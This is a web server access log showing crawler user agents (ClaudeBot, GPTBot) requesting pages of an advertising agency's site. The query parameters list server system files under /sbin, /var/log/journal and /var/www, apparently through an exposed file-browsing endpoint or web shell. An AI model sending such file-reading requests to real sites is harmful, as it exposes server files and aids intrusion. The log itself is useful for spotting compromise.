216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Flvconvert&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Feximstats&path=%2F%2Fsbin HTTP/1.0" 200 42960 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fgetty&path=%2F%2Fsbin HTTP/1.0" 200 2811 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fservice&path=%2F%2Fsbin HTTP/1.0" 200 5674 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:18 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fzic&path=%2F%2Fsbin HTTP/1.0" 200 2810 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fmkfs.bfs&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:19 +0000] "GET /our-works/phim-viral-nestle?path=%2Fvar%2Flog%2Fjournal%2F0961b82bd7214382a3af187e3baa7067 HTTP/1.0" 200 3241 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fchgpasswd&path=%2F%2Fsbin HTTP/1.0" 200 2814 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fvgscan&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:19 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Ficonvconfig&path=%2F%2Fsbin HTTP/1.0" 200 2815 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.114 - - [05/Nov/2025:00:05:19 +0000] "GET /q-~289XHEZMvTXlxBz8lKoykkj7sRGzMrq0a21688/?path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.0" 200 4581 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.182 - - [05/Nov/2025:00:05:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Frunuser&path=%2F%2Fsbin HTTP/1.0" 200 2812 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fxfs_freeze&path=%2F%2Fsbin HTTP/1.0" 200 3251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.182 - - [05/Nov/2025:00:05:20 +0000] "GET /our-works/tvc-caltex-havoline?fileloc=%2F%2Fsbin%2Fpoweroff&path=%2F%2Fsbin HTTP/1.0" 200 2813 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
